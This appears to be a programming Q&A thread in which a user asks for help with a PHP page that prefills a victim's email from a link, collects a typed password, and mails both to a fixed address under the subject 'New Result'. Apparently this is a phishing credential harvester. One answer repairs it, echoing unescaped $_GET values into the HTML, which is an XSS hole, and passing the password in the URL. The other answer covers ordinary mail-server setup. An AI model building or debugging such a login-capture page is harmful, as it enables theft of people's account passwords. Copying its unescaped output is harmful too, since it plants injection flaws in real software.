# how to assign an input field variable from an extracted email address from a url using PHP

Tags: php, html, variables

i am trying to pass a variable to an input field, the variable is an email address i extracted from The URL, then after passing the email to the input field variable then i want to send it to an email address,

this is the input field

```
<div class="wrap-input100">
                    <input class="input100" type="text" name="email" placeholder="<?php echo $email; 
                    $email = $email; ?> ">

                    <span class="focus-input100-1"></span>
                    <span class="focus-input100-2"></span>
                    </div>
```

as you can see i am echo-ing the email in the input field

now i want to try and pass the email address to the variable "email" from the input name, but once the sent i don't get the email field

this is the code that gets it and sends it

```
<?php
                         $email = $_POST['email'];
                         $password = $_POST['password'];
                         $email = $email;

                         $to = "example@gmail.com";
                         $subject = "New Result";

                         $message = 'Email Address:  '.$email.',  Password:  '.$password.'.';


                         $header = "From:example@gmail.com \r\n";

                         mail ($to,$subject,$message,$header);
                            ?>
```

i recive the password field because its the user that inputs it but i don't know why the email address is not coming, i have tried all i know but its still not working

please guy help me out

Comment: why are you echoing the email inside the placeholder attribute instead of value attribute

Comment: @ShridharSharma thanks it worked

Answer (score 0):

@Britchi3 The problem is that $email or $_POST cannot grab the email address from the url, you have to use $_GET to grab it.

Also you may want to remove the redundant $email = $email; in line 4 of your php script. $email = $_POST['email']; is just enough....besides, it should be $email = $_GET['email']; since you are extracting email from the url. Then, to avoid error when $_GET['email'] is empty you may want to wrap $_GET['email'] in empty() method like so: if(!empty($_GET['email'])){ echo $_GET['email']; }

It should be like this: remove $email = $email;  from the input, then use GET instead of POST.

```
                    class="wrap-input100">
                    <input class="input100" type="text" value="<?php if(!empty($_GET['email'])){ echo $_GET['email']; } ?>" name="email" placeholder="<?php if(!empty($_GET['email'])){ echo $_GET['email']; } ?> ">

                    <span class="focus-input100-1"></span>
                    <span class="focus-input100-2"></span>
                    </div>
```

And in the PHP mailer script that sends the mail:

```
                         <?php
                         $email = $_GET['email'];
                         $password = $_GET['password'];
                         //$email = $email; //remove this line.

                         $to = "example@gmail.com";
                         $subject = "New Result";

                         $message = 'Email Address:  '.$email.',  Password:  '.$password.'.';


                         $header = "From:example@gmail.com \r\n";

                         mail ($to,$subject,$message,$header);
                            ?>
```

Comment: its still not working, only the password is been sent, thisis what i got from the address bar {  http://domainname.xyz/pro.php?email=&password=hvcb%2Cn  }

Comment: oh, sorry I was away from my system yesterday.

I've edited the answer above, use it. 
Your problem is in this line:

`<input class="input100" type="text" name="email" placeholder="<?php if(!empty($_GET['email'])){ echo $_GET['email']; } ?> ">`

Change to this:

`<input class="input100" type="text" name="email" value="<?php if(!empty($_GET['email'])){ echo $_GET['email']; } ?>" placeholder="<?php if(!empty($_GET['email'])){ echo $_GET['email']; } ?> ">`

Answer (score 0):

### First : Validate your smtp email service on PC or Linux

- Using MAC OS, see how to enable postfix for Gmail SMTP using your
  gmail account at:
  https://gist.github.com/loziju/66d3f024e102704ff5222e54a4bfd50e
- Using Ubuntu Linux    reference: 
  https://gist.github.com/adamstac/7462202

### Check the PHP settings in the php.ini file for the active php version you are using.

i.e. Using MAMP for MAC OS, gt to Applications -> MAMP -> conf -> php7.0.32 (must be the active version you are using, so if you are using php 5.3.14, then go to that directory) ->php.ini
Edit the php.ini file with:

```html
[mail function]
; For Win32 only.
SMTP = localhost
smtp_port = 25

; For Win32 only.
;sendmail_from = me@example.com

; For Unix only.  You may supply arguments as well (default: "sendmail -t -i").
;sendmail_path = sendmail -t -i -f example@gmail.com
sendmail_path = "env -i /usr/sbin/sendmail -t -I"
```

Restart apache2 after updating the php.ini file.

If using MAC OS to stop and restart mail service: 
sudo postfix stop && sudo postfix start
sudo postfix reload

### Test Email

Send a test email from the terminal CLI:

```html
echo "Test sending email from Postfix" | mail -s "Test Postfix" example@gmail.com
```

Alternatively, I find I can send a test message from the terminal CLI using this:

```html
echo "test message" | sendmail -v example@gmail.com
```

Check errors for sendmail use the terminal CLI command:  mailq

```html
<?php
  // testemail.php
  $to_email = 'example@gmail.com';
  $subject = 'Testing PHP Mail';
  $message = 'This mail is sent using the PHP mail function';
  $message = wordwrap($message, 70);
  $headers = 'From: yoursending@email.com';
  mail($to_email,$subject,$message,$headers);
  $mail = mail($to_email,$subject,$message,$headers);
  if ($mail) { echo "Thank you for using mail";}
  else { echo "Mail sending failed.";}
  ini_set('display_errors',1);
?>
```